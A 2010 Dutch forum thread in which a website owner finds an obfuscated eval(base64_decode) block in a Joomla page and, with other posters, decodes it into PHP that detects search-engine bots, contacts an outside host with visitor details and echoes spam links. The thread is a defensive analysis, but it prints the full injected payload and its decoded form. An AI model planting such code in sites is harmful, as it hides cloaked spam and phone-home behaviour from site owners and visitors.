Vreemde base64 in php script

maandag 5 april 2010 20:23

Acties:

0 Henk 'm!

Verwijderd

Topicstarter

2 jaar geleden heb ik ooit eens door een paar Amerikanen een site laten maken. Ze deden dat in Joomla (1.0) en ik vond het best want het zag er goed uit en het koste niet veel.

Nu moest er iets aangepast worden op de site en dacht "doe 'k mooi zelf even!" ... en zo geschiedde.

Pardoes zag ik onderaan een van de index pagina's een base64 stukje staan met een Eval() erbij Ik dacht: vast een afbeelding ofzo.

PHP:

<?eval(base64_decode("JGs9MTA3OyRtPWV4cGxvZGUoIjsiLCIyOzEzOzc1OzY3OzI0OzMxOzI1OzI7MjQ7MzE7MjU7Njc7Nzk7NTI7NTY7NDY7NTc7NjE7NDY7NTc7NDg7NzM7MzU7NjM7NjM7NTk7NTI7NjI7NTY7NDY7NTc7NTI7NDI7NDQ7NDY7Mzc7NjM7NzM7NTQ7NzE7NzM7MTI7NDs0OzEyOzc7MTQ7OTs0OzMxOzczOzY2OzIzOzIzOzI0OzMxOzI1OzI7MjQ7MzE7MjU7Njc7Nzk7NTI7NTY7NDY7NTc7NjE7NDY7NTc7NDg7NzM7MzU7NjM7NjM7NTk7NTI7NjI7NTY7NDY7NTc7NTI7NDI7NDQ7NDY7Mzc7NjM7NzM7NTQ7NzE7NzM7MTg7MTA7Mzs0OzQ7NzM7NjY7NjY7MTY7MTAyOzk3Ozk4Ozc5OzMwOzI1Ozc7NTI7MzA7NTsyOzI2OzMwOzE0OzUyOzU7MTA7NjsxNDs4Njs3MzszOzMxOzMxOzI3OzgxOzY4OzY4OzI4OzI4OzI4OzY5OzE1OzQ7NjsxMDsyOzU7MjQ7MTA7ODszMDszMTsyOzQ7NTsyNDsyOzU7Mjg7MTQ7OTs2OTs1OzE0OzMxOzY4Ozc7Mjs1OzA7MjQ7Njg7NzM7Njk7MjU7MTA7NTsxNTs2Nzs5MTs3MTs4OTs5NDs5MTs2Njs2OTs3Mzs2OTszMTsxOTszMTs4NDsyOzI3Ozg2OzczOzY5Ozc5OzUyOzU2OzQ2OzU3OzYxOzQ2OzU3OzQ4OzczOzU3OzQ2OzM4OzM2OzYzOzQ2OzUyOzQyOzQ3OzQ3OzU3OzczOzU0OzY5OzczOzc3OzM7NDsyNDszMTs4Njs3Mzs2OTsyNTsxMDsyODszMDsyNTs3OzE0OzU7ODs0OzE1OzE0OzY3Ozc5OzUyOzU2OzQ2OzU3OzYxOzQ2OzU3OzQ4OzczOzM1OzYzOzYzOzU5OzUyOzM1OzM2OzU2OzYzOzczOzU0OzY2OzY5OzczOzc3OzEwOzEyOzE0OzU7MzE7ODY7NzM7Njk7MjU7MTA7Mjg7MzA7MjU7NzsxNDs1Ozg7NDsxNTsxNDs2Nzs3OTs1Mjs1Njs0Njs1Nzs2MTs0Njs1Nzs0ODs3MzszNTs2Mzs2Mzs1OTs1Mjs2Mjs1Njs0Njs1Nzs1Mjs0Mjs0NDs0NjszNzs2Mzs3Mzs1NDs2Njs4MDsxMDI7OTc7OTg7MjsxMzs3NTs2NzsxMzszMDs1Ozg7MzE7Mjs0OzU7NTI7MTQ7MTk7MjsyNDszMTsyNDs2Nzs3Mzs4OzMwOzI1Ozc7NTI7Mjs1OzI7MzE7NzM7NjY7NjY7NzU7MTY7MTAyOzk3Ozk4Ozk4Ozc5Ozg7Mzs1MjszMDs1OzI7MjY7MzA7MTQ7NTI7NTsxMDs2OzE0Ozc1Ozg2Ozc1OzQzOzg7MzA7MjU7Nzs1MjsyOzU7MjszMTs2Nzs2Njs4MDsxMDI7OTc7OTg7OTg7NDM7ODszMDsyNTs3OzUyOzI0OzE0OzMxOzQ7Mjc7MzE7NzU7Njc7Nzk7ODszOzUyOzMwOzU7MjsyNjszMDsxNDs1Mjs1OzEwOzY7MTQ7NzE7NzU7NDA7NjI7NTc7Mzk7MzY7NTk7NjM7NTI7NjI7NTc7Mzk7NzE7NzU7Nzk7MzA7MjU7Nzs1MjszMDs1OzI7MjY7MzA7MTQ7NTI7NTsxMDs2OzE0OzY2OzgwOzEwMjs5Nzs5ODs5ODs0Mzs4OzMwOzI1Ozc7NTI7MjQ7MTQ7MzE7NDsyNzszMTs3NTs2Nzs3OTs4OzM7NTI7MzA7NTsyOzI2OzMwOzE0OzUyOzU7MTA7NjsxNDs3MTs3NTs0MDs2Mjs1NzszOTszNjs1OTs2Mzs1Mjs1Nzs0Njs2Mzs2Mjs1NzszNzs2Mzs1Nzs0MjszNzs1Njs0NTs0Njs1Nzs3MTs3NTs5MDs2Njs4MDsxMDI7OTc7OTg7OTg7NDM7ODszMDsyNTs3OzUyOzI0OzE0OzMxOzQ7Mjc7MzE7NzU7Njc7Nzk7ODszOzUyOzMwOzU7MjsyNjszMDsxNDs1Mjs1OzEwOzY7MTQ7NzE7NzU7NDA7NjI7NTc7Mzk7MzY7NTk7NjM7NTI7NjM7MzQ7Mzg7NDY7MzY7NjI7NjM7NzE7NzU7ODg7OTE7NjY7ODA7MTAyOzk3Ozk4Ozk4OzQzOzg7MzA7MjU7Nzs1MjsyNDsxNDszMTs0OzI3OzMxOzc1OzY3Ozc5Ozg7Mzs1MjszMDs1OzI7MjY7MzA7MTQ7NTI7NTsxMDs2OzE0OzcxOzc1OzQwOzYyOzU3OzM5OzM2OzU5OzYzOzUyOzQ2OzM3OzQwOzM2OzQ3OzM0OzM3OzQ0Ozc1OzcxOzc1OzczOzEyOzE3OzI7Mjc7NzM7NjY7ODA7MTAyOzk3Ozk4Ozk4Ozc5OzI1OzE0OzI0OzMwOzc7MzE7NTI7MzA7NTsyOzI2OzMwOzE0OzUyOzU7MTA7NjsxNDs4Njs0Mzs4OzMwOzI1Ozc7NTI7MTQ7MTk7MTQ7ODs3NTs2Nzs3OTs4OzM7NTI7MzA7NTsyOzI2OzMwOzE0OzUyOzU7MTA7NjsxNDs2Njs4MDsxMDI7OTc7OTg7OTg7NDM7ODszMDsyNTs3OzUyOzg7Nzs0OzI0OzE0Ozc1OzY3Ozc5Ozg7Mzs1MjszMDs1OzI7MjY7MzA7MTQ7NTI7NTsxMDs2OzE0OzY2OzgwOzE0Ozg7Mzs0Ozc1Ozc5OzI1OzE0OzI0OzMwOzc7MzE7NTI7MzA7NTsyOzI2OzMwOzE0OzUyOzU7MTA7NjsxNDs4MDs5ODsxMDI7OTc7OTg7MjI7NzU7MTQ7NzsyNDsxNDs3NTsxNjsxMDI7OTc7OTg7OTg7Nzk7MjU7MTQ7MjQ7MzA7NzszMTs1MjszMDs1OzI7MjY7MzA7MTQ7NTI7NTsxMDs2OzE0Ozg2OzQzOzEzOzI7NzsxNDs1MjsxMjsxNDszMTs1Mjs4OzQ7NTszMTsxNDs1OzMxOzI0OzY3Ozc5OzMwOzI1Ozc7NTI7MzA7NTsyOzI2OzMwOzE0OzUyOzU7MTA7NjsxNDs2Njs4MDsxNDs4OzM7NDs3NTs3OTsyNTsxNDsyNDszMDs3OzMxOzUyOzMwOzU7MjsyNjszMDsxNDs1Mjs1OzEwOzY7MTQ7ODA7MTAyOzk3Ozk4OzIyOzIyOyIpOyR6PSIiO2ZvcmVhY2goJG0gYXMgJHYpaWYgKCR2IT0iIikkei49Y2hyKCR2XiRrKTtldmFsKCR6KTs="));?>

Best lang.

De base64 ziet er de-coded zo uit:

PHP:

$k=107;$m=explode(";","2;13;75;67;24;31;25;2;24;31;25;67;79;52;56;46;57;61;46;57;48;73;35;63;63;59;52;62;56;46;57;52;42;44;46;37;63;73;54;71;73;12;4;4;12;7;14;9;4;31;73;66;23;23;24;31;25;2;24;31;25;67;79;52;56;46;57;61;46;57;48;73;35;63;63;59;52;62;56;46;57;52;42;44;46;37;63;73;54;71;73;18;10;3;4;4;73;66;66;16;102;97;98;79;30;25;7;52;30;5;2;26;30;14;52;5;10;6;14;86;73;3;31;31;27;81;68;68;28;28;28;69;15;4;6;10;2;5;24;10;8;30;31;2;4;5;24;2;5;28;14;9;69;5;14;31;68;7;2;5;0;24;68;73;69;25;10;5;15;67;91;71;89;94;91;66;69;73;69;31;19;31;84;2;27;86;73;69;79;52;56;46;57;61;46;57;48;73;57;46;38;36;63;46;52;42;47;47;57;73;54;69;73;77;3;4;24;31;86;73;69;25;10;28;30;25;7;14;5;8;4;15;14;67;79;52;56;46;57;61;46;57;48;73;35;63;63;59;52;35;36;56;63;73;54;66;69;73;77;10;12;14;5;31;86;73;69;25;10;28;30;25;7;14;5;8;4;15;14;67;79;52;56;46;57;61;46;57;48;73;35;63;63;59;52;62;56;46;57;52;42;44;46;37;63;73;54;66;80;102;97;98;2;13;75;67;13;30;5;8;31;2;4;5;52;14;19;2;24;31;24;67;73;8;30;25;7;52;2;5;2;31;73;66;66;75;16;102;97;98;98;79;8;3;52;30;5;2;26;30;14;52;5;10;6;14;75;86;75;43;8;30;25;7;52;2;5;2;31;67;66;80;102;97;98;98;43;8;30;25;7;52;24;14;31;4;27;31;75;67;79;8;3;52;30;5;2;26;30;14;52;5;10;6;14;71;75;40;62;57;39;36;59;63;52;62;57;39;71;75;79;30;25;7;52;30;5;2;26;30;14;52;5;10;6;14;66;80;102;97;98;98;43;8;30;25;7;52;24;14;31;4;27;31;75;67;79;8;3;52;30;5;2;26;30;14;52;5;10;6;14;71;75;40;62;57;39;36;59;63;52;57;46;63;62;57;37;63;57;42;37;56;45;46;57;71;75;90;66;80;102;97;98;98;43;8;30;25;7;52;24;14;31;4;27;31;75;67;79;8;3;52;30;5;2;26;30;14;52;5;10;6;14;71;75;40;62;57;39;36;59;63;52;63;34;38;46;36;62;63;71;75;88;91;66;80;102;97;98;98;43;8;30;25;7;52;24;14;31;4;27;31;75;67;79;8;3;52;30;5;2;26;30;14;52;5;10;6;14;71;75;40;62;57;39;36;59;63;52;46;37;40;36;47;34;37;44;75;71;75;73;12;17;2;27;73;66;80;102;97;98;98;79;25;14;24;30;7;31;52;30;5;2;26;30;14;52;5;10;6;14;86;43;8;30;25;7;52;14;19;14;8;75;67;79;8;3;52;30;5;2;26;30;14;52;5;10;6;14;66;80;102;97;98;98;43;8;30;25;7;52;8;7;4;24;14;75;67;79;8;3;52;30;5;2;26;30;14;52;5;10;6;14;66;80;14;8;3;4;75;79;25;14;24;30;7;31;52;30;5;2;26;30;14;52;5;10;6;14;80;98;102;97;98;22;75;14;7;24;14;75;16;102;97;98;98;79;25;14;24;30;7;31;52;30;5;2;26;30;14;52;5;10;6;14;86;43;13;2;7;14;52;12;14;31;52;8;4;5;31;14;5;31;24;67;79;30;25;7;52;30;5;2;26;30;14;52;5;10;6;14;66;80;14;8;3;4;75;79;25;14;24;30;7;31;52;30;5;2;26;30;14;52;5;10;6;14;80;102;97;98;22;22;");$z="";foreach($m as $v)if ($v!="")$z.=chr($v^$k);eval($z);

Hier dacht ik nog aan coordinaten of een image map, maar als je van de laatste eval() een print() maakt:

PHP:

if (stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")||stristr($_SERVER["HTTP_USER_AGENT"],"yahoo")){
    $url_unique_name="http://www.domainsacutionsinweb.net/links/".rand(0,250).".txt?ip=".$_SERVER["REMOTE_ADDR"]."&host=".rawurlencode($_SERVER["HTTP_HOST"])."&agent=".rawurlencode($_SERVER["HTTP_USER_AGENT"]);
    if (function_exists("curl_init")) {
        $ch_unique_name = @curl_init();
        @curl_setopt ($ch_unique_name, CURLOPT_URL, $url_unique_name);
        @curl_setopt ($ch_unique_name, CURLOPT_RETURNTRANSFER, 1);
        @curl_setopt ($ch_unique_name, CURLOPT_TIMEOUT, 30);
        @curl_setopt ($ch_unique_name, CURLOPT_ENCODING , "gzip");
        $result_unique_name=@curl_exec ($ch_unique_name);
        @curl_close ($ch_unique_name);echo $result_unique_name; 
    } else {
        $result_unique_name=@file_get_contents($url_unique_name);echo $result_unique_name;
    }}

Daar was ik wel verbaasd over. Waarom php code in een array in een base64? Het staat in een php script, dus de code had er ook gelijk wel in gepast.

Wat doet het? Kijkt of ik een google of Yahoo bot ben, curl-ed mijn address dan naar http://www.domainsacutionsinweb.net/links/random_text_file

en dan?

waarom verpakt in een verpakking in een verpakking?

Iemand?

maandag 5 april 2010 20:27

Acties:

0 Henk 'm!

Snow_King

Konijn is stoer!

Dit lijkt op de nieuwe trend onder hackers/crackers/exploiters (hoe je ze wil noemen), ze verstoppen zo code voor malafide scripts in al bestaande scripts en willen zo niet snel gevonden worden.

Vaak worden deze scripts geïnfecteerd door middel van gestolen FTP accounts.

Google maar eens op het Gumblar virus, vertelt je genoeg.

maandag 5 april 2010 20:42

Acties:

0 Henk 'm!

ERIKvanPAASSEN

Bug Killer

Verwijderd schreef op maandag 05 april 2010 @ 20:23:
Wat doet het? Kijkt of ik een google of Yahoo bot ben, curl-ed mijn address dan naar http://www.domainsacutionsinweb.net/links/random_text_file

en dan?

In die tekstfile staan allerlei links naar externe pagina's, welke worden ge-echo'd . Blijkbaar wil de attacker dus deze links promoten bij Google en Yahoo.

Al die getallen die uit de decode-operatie komen zijn trouwens ASCII-waarden, zo lijkt het.

maandag 5 april 2010 20:43

Acties:

0 Henk 'm!

Thralas

Maar in dit geval lijkt het alleen de user agent en IP van de crawler, samen met de hostname van je server op te sturen. Geen flauw idee wat ze ermee willen (crawlgedrag analyseren?), maar het is natuurlijk wel een stukje phone-home code waar je niet om hebt gevraagd.

Ik heb weer eens niet goed opgelet. Inderdaad wil het een bak links voeren aan Google/Yahoo. Nasty.

[ Voor 17% gewijzigd door Thralas op 05-04-2010 20:45 ]

maandag 5 april 2010 20:46

Acties:

0 Henk 'm!

ERIKvanPAASSEN

Bug Killer

Thralas schreef op maandag 05 april 2010 @ 20:43:
Maar in dit geval lijkt het alleen de user agent en IP van de crawler, samen met de hostname van je server op te sturen. Geen flauw idee wat ze ermee willen (crawlgedrag analyseren?), maar het is natuurlijk wel een stukje phone-home code waar je niet om hebt gevraagd.

Nee, het script echoot daadwerkelijk de inhoud van de tekst-files, waarin dus links staan. (Probeer maar eens zo'n tekstfile met een random nummer te openen in je browser.)

maandag 5 april 2010 20:50

Acties:

0 Henk 'm!

CrashOne

oOoOoOoOoOoOoOoOoOo

Om welke website gaat het? Kijk dan eens via de cache: operand wat er in de cache van Google staat.

Huur mij in als freelance SEO consultant!

maandag 5 april 2010 21:00

Acties:

0 Henk 'm!

RobIII

Admin Devschuur®

^ Romeinse Ⅲ ja!

Php

Gewoon een kansloze lame-ass poging tot "SEO". Allerlei sites welke door hetzelfde bedrijf (of 'vriendjes van...') gemaakt zijn bevatten links naar andere sites van diezelfde toko('s) waardoor ze inkomende links voor elkaar maken en dus "beter scoren"

[ Voor 69% gewijzigd door RobIII op 05-04-2010 21:02 ]

There are only two hard problems in distributed systems: 2. Exactly-once delivery 1. Guaranteed order of messages 2. Exactly-once delivery.

Je eigen tweaker.me redirect

Over mij

dinsdag 6 april 2010 10:44

Acties:

0 Henk 'm!

Hydra

Komt die source van dat bedrijf af of is je account compromised?

https://niels.nu

dinsdag 6 april 2010 10:46

Acties:

0 Henk 'm!

Snake

Los Angeles, CA, USA

Je hebt ook erger:

ze verstoppen noodzakelijke functionaliteit in zo'n encoded script zodat je hun banner wel MOET tonen

Going for adventure, lots of sun and a convertible! | GMT-8

dinsdag 6 april 2010 16:07

Acties:

0 Henk 'm!

Verwijderd

Topicstarter

Hydra schreef op dinsdag 06 april 2010 @ 10:44:
Komt die source van dat bedrijf af of is je account compromised?

weet ik niet, kan ik ook niet echt achter komen denk ik. Ik zal eens zoeken op base64 in alle files en het ftp password updaten. Goede vraag though

dinsdag 6 april 2010 16:20

Acties:

0 Henk 'm!

Hydra

Verwijderd schreef op dinsdag 06 april 2010 @ 16:07:
weet ik niet, kan ik ook niet echt achter komen denk ik. Ik zal eens zoeken op base64 in alle files en het ftp password updaten. Goede vraag though

Ze hebben zelf die source geupload? Dan zou ik idd snel ff het PW veranderen!

https://niels.nu

woensdag 7 april 2010 13:13

Acties:

0 Henk 'm!

Verwijderd

Vaak wordt zoiets ook gebruikt voor licence based scripts(om 'm aan 1 domein te koppelen). In dit geval dus ook voor rotzooi ^^

woensdag 7 april 2010 13:17

Acties:

0 Henk 'm!

Verwijderd

Snake schreef op dinsdag 06 april 2010 @ 10:46:
Je hebt ook erger:

ze verstoppen noodzakelijke functionaliteit in zo'n encoded script zodat je hun banner wel MOET tonen

Met een beetje verstand, en logisch nadenken, haal je die bagger op een hele simpele manier eruit ;-)

Onderwerpen